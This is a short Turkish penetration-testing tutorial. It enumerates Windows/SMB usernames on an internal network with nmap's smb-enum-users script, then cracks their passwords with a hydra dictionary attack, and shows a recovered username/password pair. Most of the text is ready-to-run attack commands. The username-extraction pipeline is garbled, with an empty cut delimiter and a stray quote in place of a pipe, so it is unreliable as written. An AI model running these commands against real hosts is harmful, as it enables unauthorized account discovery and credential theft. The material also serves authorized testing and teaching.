İç ağ testlerinde gerçekleştilen testlerden bir tanesi de ağda ilgili kullanıcı isimlerinin belirlenmesi olmaktadır. Bu işlem Nmap ile gerçekleştirilebilmektedir. 192.168.1.0 ağı için bu adımın gerçekleştirilmesi aşağıdaki şekilde olmaktadır.
Öncelikle aktif ip adreslerinin tespit edilmesi gerekmektedi, bunun için;
# nmap -p139,445 -n 192.168.1.1-254 --open | grep -B3 "open" | grep -E
"[0-9]+.[0-9]+.[0-9]+." | awk '{print $5}' > ipler.txt
# nmap -p139,445 -n 192.168.1.1-254 --script=smb-enum-users
-iL ipler.txt > nmap-users.txt
Bu işlemlerin ardından dosya içerisinden kullanıcı isimleri temin edilmelidir.
# cat nmap-users.txt |grep -v "$" | grep -v Tmpl |grep RID |cut -d
"" -f2 |cut -d"(" -f1 |sed 's/.$//'|sed -e 's/(.* )/L1/' " sort -rn | uniq > usernames.txt
Görüldüğü gibi kullanıcı isimleri ve aktif olan ip adresleri tespit edilmektedir. Bundan sonraki adım sözlük saldırısı ile bu kullanıcıların parola bilgilerinin elde edilmesi olacaktır. Bunun için hydra veya alternatif yazılımlar kullanılabilir. Hydra ile bu işlem aşağıdaki şekilde gerçekleştirilmektedir.
# hydra -M ipler.txt smbnt -s445 -L usernames.txt -P
passwd_file.txt -t1 -e n -m D > sonuc.txt
passwd_file.txt dosyası sözlük saldırısı için kullanılacak olan sözlüğü belirtmektedir. sonuc.txt dosyası içerisinden başarılı olan denemeler aşağıdaki gibi görülmektedir.
# cat sonuc.txt | grep "[smb]" | awk '{print $3,$5,$7}'
192.168.1.37 ahmet.mehmet test37
Görüldüğü gibi başarılı olarak sonuçlanan kullanıcı adı/parola bilgisi yukarıdaki gibi olmaktadır.
Ömer ALBAYRAK